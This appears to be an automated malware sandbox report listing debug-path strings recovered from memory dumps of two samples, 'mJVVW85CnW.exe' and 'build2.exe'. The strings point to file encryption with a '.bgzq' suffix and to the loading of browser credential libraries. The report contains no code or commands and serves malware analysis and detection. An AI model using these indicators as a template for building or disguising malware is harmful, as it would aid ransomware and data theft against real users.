Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ns source: mJVVW85CnW.exe, 00000004.00000003.2286586234.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\wy\ source: mJVVW85CnW.exe, 00000004.00000003.2325083218.0000000003199000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2318938596.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317178357.00000000034D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ngs\y$ source: mJVVW85CnW.exe, 00000004.00000003.2259866717.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262409948.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\^0G source: mJVVW85CnW.exe, 00000004.00000003.2163571007.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\65\ source: mJVVW85CnW.exe, 00000004.00000003.2312713278.000000000312D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: mJVVW85CnW.exe, 00000004.00000003.2248844559.0000000009B9F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248507368.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284027851.000000000348A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\t source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\ge source: mJVVW85CnW.exe, 00000004.00000003.2329913318.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2331014211.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2327797435.00000000034F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\FY& source: mJVVW85CnW.exe, 00000004.00000003.2162286898.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2168819502.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159491269.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\lt-LT\od.pdb\we\* source: mJVVW85CnW.exe, 00000004.00000003.2327888002.0000000009BB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*\S source: mJVVW85CnW.exe, 00000004.00000003.2262080626.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258994911.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297057364.0000000009C4F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301719958.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2304465664.0000000009C5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WinX\mp\plication Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2259866717.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262409948.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\SystemAppData\\Application Data\Application Data\Microsoft\Windows\WinX\mp\plication Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C11000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2286586234.0000000009C30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb764791234.txt\ source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\G source: mJVVW85CnW.exe, 00000004.00000003.2241371499.0000000009BCD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\1 source: mJVVW85CnW.exe, 00000004.00000003.2179231504.0000000009B04000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1870379356.0000000009AF6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195101334.0000000009B00000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941513401.0000000009ADF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009AED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AF3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218719984.0000000009B0D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009AEA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\}[M source: mJVVW85CnW.exe, 00000004.00000003.2240145032.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248020922.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2256526995.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2285437225.0000000009C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BD3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249931581.0000000009BDA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248108132.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262766102.0000000009BE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\ source: mJVVW85CnW.exe, 00000004.00000003.2312373705.000000000345D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\ta\b3d8bbwe\AC\INetCookies\bbwe\AppData\pData\ad_prod.pdb\we\ source: mJVVW85CnW.exe, 00000004.00000003.2303825838.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297347518.000000000344D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\txyewy\G source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2318938596.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317178357.00000000034D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297057364.0000000009C4F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301719958.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2304465664.0000000009C5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2259866717.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262409948.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\y source: mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941876297.0000000009ACA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1867318408.0000000009ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\5 source: mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941876297.0000000009ACA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1867318408.0000000009ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rion Data\Temp\Symbols\winload_prod.pdb\UZU source: mJVVW85CnW.exe, 00000004.00000003.2293581052.0000000009C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288095953.0000000009BDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\L source: mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297247654.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297502221.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\bwe\ source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: build2.exe, 00000008.00000002.2360500626.000000006F21D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000000.1797035314.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000002.1801295260.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1799119196.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: mJVVW85CnW.exe, 00000004.00000003.2286586234.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2240525022.0000000009AC5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2241106214.0000000009AEC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2240997816.0000000009AD8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284027851.000000000348A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\prod.pdb.bgzqBARHEADLINES.json.bgzqpplication Data\Application Data\Microsoft\WindowsApps\python3.exee-4AF8-8D36-D6D6A1668750}.png.bgzqta\Default\Local Storage\*\oft Strong Cryptographic ProviderG source: mJVVW85CnW.exe, 00000004.00000003.2248884662.000000000312D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249598871.000000000312E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\( source: mJVVW85CnW.exe, 00000004.00000003.2248884662.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249712503.0000000003105000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*_ source: mJVVW85CnW.exe, 00000004.00000003.2179560126.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178824044.0000000003196000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\*\ source: mJVVW85CnW.exe, 00000004.00000003.2294528005.0000000009B49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.000000000344C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297347518.000000000344D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2328178166.0000000003563000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312713278.000000000312D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2316780959.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325305724.0000000003553000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2305805567.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2293719417.0000000003502000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\u source: mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2304503353.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303727711.000000000346C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: mJVVW85CnW.exe, mJVVW85CnW.exe, 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.bgzq source: mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\ta\b3d8bbwe\AC\INetCookies\bbwe\AppData\pData\ad_prod.pdb\we\G source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2296376245.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2294528005.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288095953.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2285800151.0000000009BE0000.00000004.00000020.00020000.00000000.sdmp
